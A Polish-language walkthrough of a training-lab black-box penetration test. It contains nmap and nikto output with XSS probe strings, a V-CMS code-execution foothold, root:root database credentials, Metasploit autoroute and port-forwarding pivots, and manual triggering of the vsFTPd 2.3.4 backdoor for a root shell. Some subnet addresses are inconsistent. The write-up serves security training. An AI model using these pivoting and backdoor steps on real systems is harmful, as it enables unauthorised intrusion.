Black-Box Penetration Test 1 - 16.06.2022 r.

Odkrycie działających urządzeń

root@INE:~# nmap -sn 192.222.122.2/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-16 16:46 IST
Nmap scan report for eu-central-4 (192.222.122.1)
Host is up (0.000058s latency).
MAC Address: 02:42:1B:4E:0E:03 (Unknown)
Nmap scan report for demo.ine.local (192.222.122.3)
Host is up (0.000014s latency).
MAC Address: 02:42:C0:DE:7A:03 (Unknown)
Nmap scan report for INE (192.222.122.2)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.02 seconds


192.222.122.1
192.222.122.2
192.222.122.3

192.222.122.1

root@INE:~# nmap -sC -sV 192.222.122.1                                                                                                                                                      
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-16 16:54 IST                                                                                                                             
Nmap scan report for eu-central-4 (192.222.122.1)                                                                                                                                           
Host is up (0.0000060s latency).                                                                                                                                                            
Not shown: 997 closed tcp ports (reset)                                                                                                                                                     
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d:7d:e8:5e:f7:e9:c6:0b:f9:6a:c3:e7:50:95:b8:89 (RSA)
|   256 c9:74:8e:16:fb:5b:1a:df:da:df:5d:85:98:78:fa:71 (ECDSA)
|_  256 88:da:ea:6c:0b:3e:c1:de:96:d5:f1:c7:ea:a5:8b:44 (ED25519)
80/tcp  filtered http
443/tcp filtered https
MAC Address: 02:42:1B:4E:0E:03 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds

192.222.122.3 (demo.ine.local)

root@INE:~# nmap -sC -sV 192.222.122.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-16 16:54 IST
Nmap scan report for demo.ine.local (192.222.122.3)
Host is up (0.0000090s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: V-CMS-Powered by V-CMS
|_http-server-header: nginx/1.14.0
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 02:42:C0:DE:7A:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.69 seconds

Nikto

root@INE:~# nikto --url demo.ine.local
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.222.122.3
+ Target Hostname:    demo.ine.local
+ Target Port:        80
+ Start Time:         2022-06-16 16:55:20 (GMT5.5)
---------------------------------------------------------------------------
+ Server: nginx/1.14.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2820: /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-50552: /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /install/install.php: Install file found.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ 7863 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2022-06-16 16:55:26 (GMT5.5) (6 seconds)
---------------------------------------------------------------------------

Z użyciem Google znalazłem, że V-CMS 1.0 ma poważną podatność i można dostać na maszynę od razu z możliwością wykonywania kodu.

W tym przypadku dostajemy rownież pełne prawa administratora. Ma pulpicie oprócz flagi.txt 4f96a3e848d233d5af337c440e50fe3d jest również plik startup.sh.

Widać credentiale do bazy danych root:root.

show databases;
use database vcms;
ERROR 1049 (42000) at line 2: Unknown database 'database'
Database
information_schema
mysql
performance_schema
sys
vcms

Tables_in_vcms
active_guests
active_users
banned_users
configuration
domain_sort
domains
img_revisions
page_sort
pages
permissions
revisions
users

Udaje się wyświetlić dane z bazy vcms i tabeli users. Ale nie ma tam nic interesującego.

Routing na 192.144.125.0

Ponieważ korzystam z Metasploit, zatem mogę użyć prostego sposobu na przekierowanie ruchu na dalszy hop w sieci.

#ip route add 192.144.125.0/24 via 192.49.29.1

meterpreter > run autoroute -s 192.144.125.0/24 -n 255.255.255.0

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.144.125.0/255.255.255.0...
[+] Added route to 192.144.125.0/255.255.255.0 via 192.49.29.3
[*] Use the -p option to list all active routes

Portforwading Metasploit

Host 192.144.125.3 ma otwarty port 21. To jest obecnie najważniejszy target. Korzystam z platformy INE, niestety połączenie nie jest możliwe poprzez VPN. Normalnie przeprowadziłbym tunelowanie portu poprzez narzędzie Chisel.

meterpreter > portfwd add -l 21 -p 21 -r 192.241.92.3

Następnie sprawdzam lokalny port 1234.

Ta wersja jest podatna na wykonanie kodu. vsFTPd v2.3.4 Backdoor Command Execution (CVE-2011-2523)

https://metalkey.github.io/vsftpd-v234-backdoor-command-execution.html

https://www.youtube.com/watch?v=G7nIWUMvn0o&ab_channel=ExploitAcademy

Ponieważ exploit od Metasploita nie działał poprawnie, musiałem poradzić sobie samemu.

W polu użytkownika należy wpisać losowy tekst, ale na końcu umieścić :). W moim przypadku wpisałem 123456:). Hasło nie zna znaczenia. Zostanie uruchomione na porcie 6200 połączenie na poziomie roota.

W związku z czym przekierowuję jeszcze jeden port.

portfwd add -l 6200 -p 6200 -r 192.241.92.3

flag.txt 58c7c29a8ab5e7c4c06256b954947f9a